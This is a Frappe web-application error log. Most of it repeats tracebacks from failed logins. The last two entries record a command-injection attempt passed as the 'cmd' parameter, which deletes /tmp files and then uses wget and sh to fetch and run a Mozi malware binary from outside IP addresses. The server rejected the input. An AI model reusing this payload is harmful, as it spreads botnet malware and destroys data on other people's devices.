Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 99, in application
    init_request(request)
  File "apps/frappe/frappe/app.py", line 195, in init_request
    frappe.local.http_request = HTTPRequest()
  File "apps/frappe/frappe/auth.py", line 44, in __init__
    self.set_session()
  File "apps/frappe/frappe/auth.py", line 78, in set_session
    frappe.local.login_manager = LoginManager()
  File "apps/frappe/frappe/auth.py", line 111, in __init__
    if self.login() is False:
  File "apps/frappe/frappe/auth.py", line 136, in login
    self.authenticate(user=user, pwd=pwd)
  File "apps/frappe/frappe/auth.py", line 252, in authenticate
    self.fail("Invalid login credentials", user=_raw_user_name)
  File "apps/frappe/frappe/auth.py", line 308, in fail
    raise frappe.AuthenticationError
frappe.exceptions.AuthenticationError

Traceback (most recent call last):
  File "apps/frappe/frappe/handler.py", line 74, in execute_cmd
    method = get_attr(cmd)
  File "apps/frappe/frappe/handler.py", line 288, in get_attr
    method = frappe.get_attr(cmd)
  File "apps/frappe/frappe/__init__.py", line 1711, in get_attr
    throw(_("App {0} is not installed").format(app_name), AppNotInstalledError)
  File "apps/frappe/frappe/__init__.py", line 602, in throw
    msgprint(
  File "apps/frappe/frappe/__init__.py", line 567, in msgprint
    _raise_exception()
  File "apps/frappe/frappe/__init__.py", line 518, in _raise_exception
    raise exc
frappe.exceptions.AppNotInstalledError: App rm -rf /tmp/*;wget http://192 n'est pas installée

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 110, in application
    frappe.handler.handle()
  File "apps/frappe/frappe/handler.py", line 49, in handle
    data = execute_cmd(cmd)
  File "apps/frappe/frappe/handler.py", line 76, in execute_cmd
    frappe.throw(_("Failed to get method for command {0} with {1}").format(cmd, e))
  File "apps/frappe/frappe/__init__.py", line 602, in throw
    msgprint(
  File "apps/frappe/frappe/__init__.py", line 567, in msgprint
    _raise_exception()
  File "apps/frappe/frappe/__init__.py", line 518, in _raise_exception
    raise exc
frappe.exceptions.ValidationError: Failed to get method for command rm -rf /tmp/*;wget http://192.168.1.1:8088/Mozi.m -O /tmp/netgear;sh netgear with App rm -rf /tmp/*;wget http://192 n'est pas installée

Traceback (most recent call last):
  File "apps/frappe/frappe/handler.py", line 74, in execute_cmd
    method = get_attr(cmd)
  File "apps/frappe/frappe/handler.py", line 288, in get_attr
    method = frappe.get_attr(cmd)
  File "apps/frappe/frappe/__init__.py", line 1711, in get_attr
    throw(_("App {0} is not installed").format(app_name), AppNotInstalledError)
  File "apps/frappe/frappe/__init__.py", line 602, in throw
    msgprint(
  File "apps/frappe/frappe/__init__.py", line 567, in msgprint
    _raise_exception()
  File "apps/frappe/frappe/__init__.py", line 518, in _raise_exception
    raise exc
frappe.exceptions.AppNotInstalledError: App rm -rf /tmp/*;wget http://45 n'est pas installée

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 110, in application
    frappe.handler.handle()
  File "apps/frappe/frappe/handler.py", line 49, in handle
    data = execute_cmd(cmd)
  File "apps/frappe/frappe/handler.py", line 76, in execute_cmd
    frappe.throw(_("Failed to get method for command {0} with {1}").format(cmd, e))
  File "apps/frappe/frappe/__init__.py", line 602, in throw
    msgprint(
  File "apps/frappe/frappe/__init__.py", line 567, in msgprint
    _raise_exception()
  File "apps/frappe/frappe/__init__.py", line 518, in _raise_exception
    raise exc
frappe.exceptions.ValidationError: Failed to get method for command rm -rf /tmp/*;wget http://45.164.177.218:11840/Mozi.m -O /tmp/netgear;sh netgear with App rm -rf /tmp/*;wget http://45 n'est pas installée

